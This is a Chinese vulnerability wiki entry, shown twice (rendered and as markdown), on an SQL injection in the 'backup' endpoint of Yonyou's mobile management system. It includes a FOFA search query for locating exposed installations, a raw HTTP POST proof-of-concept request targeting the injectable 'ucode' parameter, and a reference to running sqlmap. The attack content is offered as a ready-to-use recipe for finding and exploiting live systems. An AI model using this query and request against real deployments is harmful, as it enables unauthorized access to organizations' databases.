fofamini-wiki

登录白背景

源码

用友移动管理系统backup存在SQL注入漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统backup参数存在SQL注入漏洞

二、影响版本

用友移动系统管理系统

三、资产测绘

fofaapp="用友-移动系统管理"
特征

四、漏洞复现

POST /maportal/usermanager/backup?ucode=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
SL-CE-SUID: 18

a=a

sqlmap

原文: https://www.yuque.com/xiaokp7/ocvun2/qh5fe1wwkg6uggog

# 用友移动管理系统backup存在SQL注入漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统backup参数存在SQL注入漏洞

# 二、影响版本

- 用友移动系统管理系统

# 三、资产测绘

- fofa`app="用友-移动系统管理"`
- 特征

![image.png](./img/cxpbMCVFktBVgQpk/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-428704.png)

# 四、漏洞复现
```
POST /maportal/usermanager/backup?ucode=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
SL-CE-SUID: 18

a=a
```
![image.png](./img/cxpbMCVFktBVgQpk/1700497670062-9ae4745c-974b-4b6d-bdc0-1b53930ed36b-212439.png)
sqlmap 
![image.png](./img/cxpbMCVFktBVgQpk/1700497680934-5ae10164-57cf-4f0d-905a-230d8203e655-174343.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qh5fe1wwkg6uggog>